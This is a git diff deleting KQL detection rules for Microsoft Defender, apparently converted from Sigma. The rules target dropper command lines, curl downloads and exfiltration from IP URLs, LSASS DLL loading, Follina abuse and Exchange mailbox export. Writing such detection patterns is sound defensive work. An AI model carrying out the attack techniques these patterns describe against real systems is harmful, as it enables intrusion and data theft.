diff --git a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql b/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql
deleted file mode 100644
index fb202cf7..00000000
--- a/Execution/Command_Line_Execution_with_Suspicious_URL_and_AppData_Strings.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell)
-// Tags: attack.execution, attack.command_and_control, attack.t1059.003, attack.t1059.001, attack.t1105
-DeviceProcessEvents
-| where (ProcessCommandLine contains "http" and ProcessCommandLine contains "://" and ProcessCommandLine contains "%AppData%") and FolderPath endswith "\\cmd.exe"
\ No newline at end of file
diff --git a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql b/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql
deleted file mode 100644
index 5ca60a02..00000000
--- a/Execution/Computer_Password_Change_Via_Ksetup.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/04/06
-// Level: medium
-// Description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains " /setcomputerpassword " and (FolderPath endswith "\\ksetup.exe" or ProcessVersionInfoOriginalFileName =~ "ksetup.exe")
\ No newline at end of file
diff --git a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
deleted file mode 100644
index 3aa4acf8..00000000
--- a/Execution/Computer_System_Reconnaissance_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/09/08
-// Level: medium
-// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
-// Tags: attack.discovery, attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql b/Execution/Conhost.exe_CommandLine_Path_Traversal.kql
deleted file mode 100644
index f38d94ed..00000000
--- a/Execution/Conhost.exe_CommandLine_Path_Traversal.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/14
-// Level: high
-// Description: detects the usage of path traversal in conhost.exe indicating possible command/argument confusion/hijacking
-// Tags: attack.execution, attack.t1059.003
-DeviceProcessEvents
-| where ProcessCommandLine contains "/../../" and InitiatingProcessCommandLine contains "conhost"
\ No newline at end of file
diff --git a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql b/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql
deleted file mode 100644
index bf76ea86..00000000
--- a/Execution/Conhost_Spawned_By_Uncommon_Parent_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Tim Rauch, Elastic (idea)
-// Date: 2022/09/28
-// Level: medium
-// Description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where (FolderPath endswith "\\conhost.exe" and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessFolderPath endswith "\\lsass.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\services.exe" or InitiatingProcessFolderPath endswith "\\smss.exe" or InitiatingProcessFolderPath endswith "\\spoolsv.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\userinit.exe" or InitiatingProcessFolderPath endswith "\\wininit.exe" or InitiatingProcessFolderPath endswith "\\winlogon.exe")) and (not((InitiatingProcessCommandLine contains "-k apphost -s AppHostSvc" or InitiatingProcessCommandLine contains "-k imgsvc" or InitiatingProcessCommandLine contains "-k localService -p -s RemoteRegistry" or InitiatingProcessCommandLine contains "-k LocalSystemNetworkRestricted -p -s NgcSvc" or InitiatingProcessCommandLine contains "-k NetSvcs -p -s NcaSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s NetSetupSvc" or InitiatingProcessCommandLine contains "-k netsvcs -p -s wlidsvc" or InitiatingProcessCommandLine contains "-k NetworkService -p -s DoSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s AppXSvc" or InitiatingProcessCommandLine contains "-k wsappx -p -s ClipSVC"))) and (not((InitiatingProcessCommandLine contains "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessCommandLine contains "C:\\Program Files\\Dropbox\\Client\\")))
\ No newline at end of file
diff --git a/Execution/Control_Panel_Items.kql b/Execution/Control_Panel_Items.kql
deleted file mode 100644
index de98b896..00000000
--- a/Execution/Control_Panel_Items.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
-// Date: 2020/06/22
-// Level: high
-// Description: Detects the malicious use of a control panel item
-// Tags: attack.execution, attack.defense_evasion, attack.t1218.002, attack.persistence, attack.t1546
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "add" and ProcessCommandLine contains "CurrentVersion\\Control Panel\\CPLs") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or (ProcessCommandLine endswith ".cpl" and (not(((ProcessCommandLine contains "regsvr32 " and ProcessCommandLine contains " /s " and ProcessCommandLine contains "igfxCPL.cpl") or (ProcessCommandLine contains "\\System32\\" or ProcessCommandLine contains "%System%" or ProcessCommandLine contains "|C:\\Windows\\system32|")))))
\ No newline at end of file
diff --git a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql b/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
deleted file mode 100644
index 1f4c9f72..00000000
--- a/Execution/ConvertTo-SecureString_Cmdlet_Usage_Via_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
-// Date: 2020/10/11
-// Level: medium
-// Description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
-// Tags: attack.defense_evasion, attack.t1027, attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "ConvertTo-SecureString" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))
\ No newline at end of file
diff --git a/Execution/Created_Files_by_Microsoft_Sync_Center.kql b/Execution/Created_Files_by_Microsoft_Sync_Center.kql
deleted file mode 100644
index ef6299fb..00000000
--- a/Execution/Created_Files_by_Microsoft_Sync_Center.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: elhoim
-// Date: 2022/04/28
-// Level: medium
-// Description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
-// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion
-DeviceFileEvents
-| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (FolderPath endswith ".dll" or FolderPath endswith ".exe")
\ No newline at end of file
diff --git a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql b/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
deleted file mode 100644
index 544ae6eb..00000000
--- a/Execution/Csc.EXE_Execution_Form_Potentially_Suspicious_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
-// Date: 2019/02/11
-// Level: high
-// Description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
-// Tags: attack.execution, attack.t1059.005, attack.t1059.007, attack.defense_evasion, attack.t1218.005, attack.t1027.004
-DeviceProcessEvents
-| where (FolderPath endswith "\\csc.exe" or ProcessVersionInfoOriginalFileName =~ "csc.exe") and ((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or ((InitiatingProcessCommandLine contains "-Encoded " or InitiatingProcessCommandLine contains "FromBase64String") and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) or (InitiatingProcessCommandLine matches regex "([Pp]rogram[Dd]ata|%([Ll]ocal)?[Aa]pp[Dd]ata%|\\\\[Aa]pp[Dd]ata\\\\([Ll]ocal([Ll]ow)?|[Rr]oaming))\\\\[^\\\\]{1,256}$" or (InitiatingProcessCommandLine contains ":\\PerfLogs\\" or InitiatingProcessCommandLine contains ":\\Users\\Public\\" or InitiatingProcessCommandLine contains ":\\Windows\\Temp\\" or InitiatingProcessCommandLine contains "\\Temporary Internet") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favorites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Favourites\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Contacts\\") or (InitiatingProcessCommandLine contains ":\\Users\\" and InitiatingProcessCommandLine contains "\\Pictures\\"))) and (not(((InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\") or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\sdiagnhost.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\inetsrv\\w3wp.exe"))) and (not(((InitiatingProcessCommandLine contains "JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw" or InitiatingProcessCommandLine contains "cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA" or InitiatingProcessCommandLine contains "nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA") or InitiatingProcessFolderPath =~ "C:\\ProgramData\\chocolatey\\choco.exe" or InitiatingProcessCommandLine contains "\\ProgramData\\Microsoft\\Windows Defender Advanced Threat Protection")))
\ No newline at end of file
diff --git a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql b/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql
deleted file mode 100644
index 62a6d145..00000000
--- a/Execution/Curl_Web_Request_With_Potential_Custom_User-Agent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/07/27
-// Level: medium
-// Description: Detects execution of "curl.exe" with a potential custom "User-Agent". Attackers can leverage this to download or exfiltrate data via "curl" to a domain that only accept specific "User-Agent" strings
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains "User-Agent:" and ProcessCommandLine matches regex "\\s-H\\s") and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe")
\ No newline at end of file
diff --git a/Execution/DLL_Load_via_LSASS.kql b/Execution/DLL_Load_via_LSASS.kql
deleted file mode 100644
index 0cc97026..00000000
--- a/Execution/DLL_Load_via_LSASS.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019/10/16
-// Level: high
-// Description: Detects a method to load DLL via LSASS process using an undocumented Registry key
-// Tags: attack.execution, attack.persistence, attack.t1547.008
-DeviceRegistryEvents
-| where (RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\DirectoryServiceExtPt" or RegistryKey contains "\\CurrentControlSet\\Services\\NTDS\\LsaDbExtPt") and (not(((RegistryValueData in~ ("%%systemroot%%\\system32\\ntdsa.dll", "%%systemroot%%\\system32\\lsadb.dll")) and InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\lsass.exe")))
\ No newline at end of file
diff --git a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql b/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
deleted file mode 100644
index 42c5fde8..00000000
--- a/Execution/Detection_of_PowerShell_Execution_via_Sqlps.exe.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Agro (@agro_sev) oscd.community
-// Date: 2020/10/10
-// Level: medium
-// Description: This rule detects execution of a PowerShell code through the sqlps.exe utility, which is included in the standard set of utilities supplied with the MSSQL Server.
-Script blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of these logs.
-
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\sqlps.exe" or ((FolderPath endswith "\\sqlps.exe" or ProcessVersionInfoOriginalFileName =~ "sqlps.exe") and (not(InitiatingProcessFolderPath endswith "\\sqlagent.exe")))
\ No newline at end of file
diff --git a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql b/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
deleted file mode 100644
index 4a2e8091..00000000
--- a/Execution/Dllhost.EXE_Initiated_Network_Connection_To_Non-Local_IP_Address.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: bartblaze
-// Date: 2020/07/13
-// Level: medium
-// Description: Detects dllhost initiating a network connection to a non-local IP address.
-Aside from Microsoft own IP range that needs to be excluded. Network communication from Dllhost will depend entirely on the hosted DLL.
-An initial baseline is recommended before deployment.
-
-// Tags: attack.defense_evasion, attack.t1218, attack.execution, attack.t1559.001
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\dllhost.exe" and (not(((ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "fc00::/7") or ipv4_is_in_range(RemoteIP, "fe80::/10")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.224.0.0/11") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")))))
\ No newline at end of file
diff --git a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql b/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql
deleted file mode 100644
index 5eda2d31..00000000
--- a/Execution/DotNET_Assembly_DLL_Loaded_Via_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Antonlovesdnb
-// Date: 2020/02/19
-// Level: medium
-// Description: Detects any assembly DLL being loaded by an Office Product
-// Tags: attack.execution, attack.t1204.002
-DeviceImageLoadEvents
-| where FolderPath startswith "C:\\Windows\\assembly\\" and (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\mspub.exe" or InitiatingProcessFolderPath endswith "\\onenote.exe" or InitiatingProcessFolderPath endswith "\\onenoteim.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe")
\ No newline at end of file
diff --git a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql b/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
deleted file mode 100644
index 5f8aed77..00000000
--- a/Execution/DotNet_CLR_DLL_Loaded_By_Scripting_Applications.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: omkar72, oscd.community
-// Date: 2020/10/14
-// Level: high
-// Description: Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.
-// Tags: attack.execution, attack.privilege_escalation, attack.t1055
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\clr.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\mscorlib.dll") and (InitiatingProcessFolderPath endswith "\\cmstp.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\msxsl.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wmic.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")
\ No newline at end of file
diff --git a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql b/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql
deleted file mode 100644
index 5c3a7ad7..00000000
--- a/Execution/Enable_Microsoft_Dynamic_Data_Exchange.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/26
-// Level: medium
-// Description: Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.
-// Tags: attack.execution, attack.t1559.002
-DeviceRegistryEvents
-| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLaunch" or RegistryKey endswith "\\Excel\\Security\\DisableDDEServerLookup")) or ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)")) and RegistryKey endswith "\\Word\\Security\\AllowDDE")
\ No newline at end of file
diff --git a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql b/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql
deleted file mode 100644
index 32eb0763..00000000
--- a/Execution/Exchange_PowerShell_Snap-Ins_Usage.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/03/03
-// Level: high
-// Description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
-// Tags: attack.execution, attack.t1059.001, attack.collection, attack.t1114
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (ProcessCommandLine contains "Microsoft.Exchange.Powershell.Snapin" or ProcessCommandLine contains "Microsoft.Exchange.Management.PowerShell.SnapIn")) and (not((ProcessCommandLine contains "$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null" and InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\msiexec.exe")))
\ No newline at end of file
diff --git a/Execution/Execute_Code_with_Pester.bat.kql b/Execution/Execute_Code_with_Pester.bat.kql
deleted file mode 100644
index 0676e78a..00000000
--- a/Execution/Execute_Code_with_Pester.bat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Julia Fomina, oscd.community
-// Date: 2020/10/08
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "Pester" and ProcessCommandLine contains "Get-Help") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")) or (((ProcessCommandLine contains "pester" and ProcessCommandLine contains ";") and FolderPath endswith "\\cmd.exe") and (ProcessCommandLine contains "help" or ProcessCommandLine contains "?"))
\ No newline at end of file
diff --git a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql b/Execution/Execute_Code_with_Pester.bat_as_Parent.kql
deleted file mode 100644
index 7a116895..00000000
--- a/Execution/Execute_Code_with_Pester.bat_as_Parent.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113, Nasreddine Bencherchali
-// Date: 2022/08/20
-// Level: medium
-// Description: Detects code execution via Pester.bat (Pester - Powershell Modulte for testing)
-// Tags: attack.execution, attack.t1059.001, attack.defense_evasion, attack.t1216
-DeviceProcessEvents
-| where (InitiatingProcessCommandLine contains "{ Invoke-Pester -EnableExit ;" or InitiatingProcessCommandLine contains "{ Get-Help \"") and (InitiatingProcessCommandLine contains "\\WindowsPowerShell\\Modules\\Pester\\" and (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe"))
\ No newline at end of file
diff --git a/Execution/Execute_MSDT_Via_Answer_File.kql b/Execution/Execute_MSDT_Via_Answer_File.kql
deleted file mode 100644
index 3ce729d9..00000000
--- a/Execution/Execute_MSDT_Via_Answer_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects execution of "msdt.exe" using an answer file which is simulating the legitimate way of calling msdt via "pcwrun.exe" (For example from the compatibility tab)
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -af " or ProcessCommandLine contains " /af ") and (ProcessCommandLine contains "\\WINDOWS\\diagnostics\\index\\PCWDiagnostic.xml" and FolderPath endswith "\\msdt.exe")) and (not(InitiatingProcessFolderPath endswith "\\pcwrun.exe"))
\ No newline at end of file
diff --git a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql b/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
deleted file mode 100644
index b385a85e..00000000
--- a/Execution/Execute_Pcwrun.EXE_To_Leverage_Follina.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/13
-// Level: high
-// Description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
-// Tags: attack.defense_evasion, attack.t1218, attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "../" and FolderPath endswith "\\pcwrun.exe"
\ No newline at end of file
diff --git a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql b/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql
deleted file mode 100644
index b8a0887b..00000000
--- a/Execution/Execution_of_Powershell_Script_in_Public_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Max Altgelt (Nextron Systems)
-// Date: 2022/04/06
-// Level: high
-// Description: This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder
-// Tags: attack.execution, attack.t1059.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-f C:\\Users\\Public" or ProcessCommandLine contains "-f \"C:\\Users\\Public" or ProcessCommandLine contains "-f %Public%" or ProcessCommandLine contains "-fi C:\\Users\\Public" or ProcessCommandLine contains "-fi \"C:\\Users\\Public" or ProcessCommandLine contains "-fi %Public%" or ProcessCommandLine contains "-fil C:\\Users\\Public" or ProcessCommandLine contains "-fil \"C:\\Users\\Public" or ProcessCommandLine contains "-fil %Public%" or ProcessCommandLine contains "-file C:\\Users\\Public" or ProcessCommandLine contains "-file \"C:\\Users\\Public" or ProcessCommandLine contains "-file %Public%") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Execution/File_Decryption_Using_Gpg4win.kql b/Execution/File_Decryption_Using_Gpg4win.kql
deleted file mode 100644
index f709dd6a..00000000
--- a/Execution/File_Decryption_Using_Gpg4win.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/09
-// Level: medium
-// Description: Detects usage of Gpg4win to decrypt files
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -d " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql b/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql
deleted file mode 100644
index 21f09ae9..00000000
--- a/Execution/File_Download_From_IP_Based_URL_Via_CertOC.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/10/18
-// Level: high
-// Description: Detects when a user downloads a file from an IP based URL using CertOC.exe
-// Tags: attack.command_and_control, attack.execution, attack.t1105
-DeviceProcessEvents
-| where ProcessCommandLine contains "-GetCACAPS" and (FolderPath endswith "\\certoc.exe" or ProcessVersionInfoOriginalFileName =~ "CertOC.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}"
\ No newline at end of file
diff --git a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql b/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql
deleted file mode 100644
index 83ae871e..00000000
--- a/Execution/File_Download_From_IP_URL_Via_Curl.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/10/18
-// Level: medium
-// Description: Detects file downloads directly from IP address URL using curl.exe
-// Tags: attack.execution
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -O" or ProcessCommandLine contains "--remote-name" or ProcessCommandLine contains "--output") and ProcessCommandLine contains "http" and (FolderPath endswith "\\curl.exe" or ProcessVersionInfoOriginalFileName =~ "curl.exe") and ProcessCommandLine matches regex "://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}") and (not((ProcessCommandLine endswith ".bat" or ProcessCommandLine endswith ".bat\"" or ProcessCommandLine endswith ".dat" or ProcessCommandLine endswith ".dat\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".exe" or ProcessCommandLine endswith ".exe\"" or ProcessCommandLine endswith ".gif" or ProcessCommandLine endswith ".gif\"" or ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".hta\"" or ProcessCommandLine endswith ".jpeg" or ProcessCommandLine endswith ".jpeg\"" or ProcessCommandLine endswith ".log" or ProcessCommandLine endswith ".log\"" or ProcessCommandLine endswith ".msi" or ProcessCommandLine endswith ".msi\"" or ProcessCommandLine endswith ".png" or ProcessCommandLine endswith ".png\"" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".ps1\"" or ProcessCommandLine endswith ".psm1" or ProcessCommandLine endswith ".psm1\"" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbe\"" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".vbs\"" or ProcessCommandLine endswith ".bat'" or ProcessCommandLine endswith ".dat'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".exe'" or ProcessCommandLine endswith ".gif'" or ProcessCommandLine endswith ".hta'" or ProcessCommandLine endswith ".jpeg'" or ProcessCommandLine endswith ".log'" or ProcessCommandLine endswith ".msi'" or ProcessCommandLine endswith ".png'" or ProcessCommandLine endswith ".ps1'" or ProcessCommandLine endswith ".psm1'" or ProcessCommandLine endswith ".vbe'" or ProcessCommandLine endswith ".vbs'")))
\ No newline at end of file
diff --git a/Execution/File_Encryption_Using_Gpg4win.kql b/Execution/File_Encryption_Using_Gpg4win.kql
deleted file mode 100644
index b2f433f3..00000000
--- a/Execution/File_Encryption_Using_Gpg4win.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/09
-// Level: medium
-// Description: Detects usage of Gpg4win to encrypt files
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -c " and ProcessCommandLine contains "passphrase") and ((FolderPath endswith "\\gpg.exe" or FolderPath endswith "\\gpg2.exe") or ProcessVersionInfoFileDescription =~ "GnuPG’s OpenPGP tool")
\ No newline at end of file
diff --git a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql b/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql
deleted file mode 100644
index 2f85709f..00000000
--- a/Execution/File_With_Uncommon_Extension_Created_By_An_Office_Application.kql
+++ /dev/null
@@ -1,7 +0,0 @@
